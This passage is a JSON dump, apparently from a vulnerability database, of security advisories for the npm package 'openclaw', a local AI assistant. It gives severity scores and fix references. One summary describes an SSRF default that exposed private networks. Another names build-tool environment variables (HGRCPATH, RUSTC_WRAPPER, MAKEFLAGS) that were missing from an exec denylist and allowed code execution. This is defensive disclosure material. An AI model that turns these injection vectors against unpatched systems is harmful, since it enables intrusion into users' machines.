jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4h
z5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4
yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf
va-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4
p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35624","GHSA-xhq5-45pm-2gjr"],"risk_score":1.9,"exploitability":"0.5","weighted_severity":"3.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3xeb-phgc-vkcg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89051?format=json","vulnerability_id":"VCID-3xmj-n798-x3cw","summary":"
OpenClaw: Browser SSRF policy default allowed private-network navigation\n## Summary\n\nBrowser SSRF policy default allowed private-network navigation.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.14`\n- Patched versions: `>= 2026.4.14`\n\n## Impact\n\nBrowser SSRF protection could allow private-network navigation by default in paths where restrictive behavior was expected, exposing internal services or metadata endpoints through browser-driven requests.\n\n## Technical Details\n\nThe fix preserves strict SSRF configuration semantics, keeps private-network access disabled unless explicitly opted in, and updates loopback CDP readiness handling for the stricter default.\n\n## Fix\n\nThe issue was fixed in #66354 and #66386. The first stable tag containing the fix is `v2026.4.14`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `024f4614a1a1831406e763adc40ef226e3d5e9ed`\n- `1dabfef28db523e7de81edeb3dd689e9171236a2`\n- `213c36cf51121ef6c05cfccd78037371f968f31a`\n- `7eecfa411df3d12e6b810e6ca5df47254fc3db3f`\n- PR: #66354, #66386\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.14 or newer. 
The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43527","reference_id":"","reference_type":"","scores":[{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10565","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00039","scoring_system":"epss","scoring_elements":"0.1227","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00039","scoring_system":"epss","scoring_elements":"0.12235","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43527"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/024f4614a1a1831406e763adc40ef226e3d5e9ed","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:39:27Z/"}],"url":"https://github.com/openclaw/openclaw/commit/024f4614a1a1831406e763adc40ef226e3d5e9ed"},{"reference_url
":"https://github.com/openclaw/openclaw/commit/1dabfef28db523e7de81edeb3dd689e9171236a2","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:39:27Z/"}],"url":"https://github.com/openclaw/openclaw/commit/1dabfef28db523e7de81edeb3dd689e9171236a2"},{"reference_url":"https://github.com/openclaw/openclaw/commit/213c36cf51121ef6c05cfccd78037371f968f31a","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:39:27Z/"}],"url":"https://github.com/openclaw/openclaw/commit/213c36cf51121ef6c05cfccd78037371f968f31a"},{"reference_url":"https://github.com/openclaw/openclaw/commit/7eecfa411df3d12e6b810e6ca5df47254fc3db3f","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value"
:"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:39:27Z/"}],"url":"https://github.com/openclaw/openclaw/commit/7eecfa411df3d12e6b810e6ca5df47254fc3db3f"},{"reference_url":"https://github.com/openclaw/openclaw/pull/66354","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/66354"},{"reference_url":"https://github.com/openclaw/openclaw/pull/66386","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/66386"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-53vx-pmqw-863c","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_s
ystem":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:39:27Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-53vx-pmqw-863c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43527","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43527"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-private-network-navigation","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:39:27Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-private-network-navigation"},{"reference_url":"https://github.com/advisories/GHSA-53vx-pmqw-863c","reference_id":"GHSA-53vx-pmqw-863c","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-53vx-pmqw-863c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109967?format=json","purl":"pkg:npm/openclaw@2026.4.14","is_vulne
rable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.14"}],"aliases":["CVE-2026-43527","GHSA-53vx-pmqw-863c"],"risk_score":3.5,"exploitability":"0.5","weighted_severity":"6.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3xmj-n798-x3cw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89496?format=json","vulnerability_id":"VCID-3zwq-dz2u-pqgv","summary":"OpenClaw: HGRCPATH, CARGO_BUILD_RUSTC_WRAPPER, RUSTC_WRAPPER, and MAKEFLAGS missing from exec env denylist — RCE via build tool env injection (GHSA-cm8v-2vh9-cxf3 class)\n## Impact\n\nHGRCPATH, CARGO_BUILD_RUSTC_WRAPPER, RUSTC_WRAPPER, and MAKEFLAGS missing from exec env denylist — RCE via build tool env injection 
(GHSA-cm8v-2vh9-cxf3 class).\n\nMissing denylist entries allowed hostile build-tool environment variables to influence host exec commands.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.8`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\nThanks @boy-hack of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42427","reference_id":"","reference_type":"","scores":[{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11001","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.10959","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.10993","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42427"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI
:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7437-7hg8-frrw","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7437-7hg8-frrw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42427","reference_id":"CVE-2026-42427","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42427"},{"reference_url":"https://github.com/advisories/GHSA-7437-7hg8-frrw","reference_id":"GHSA-7437-7hg8-frrw","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7437-7hg8-frrw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VC
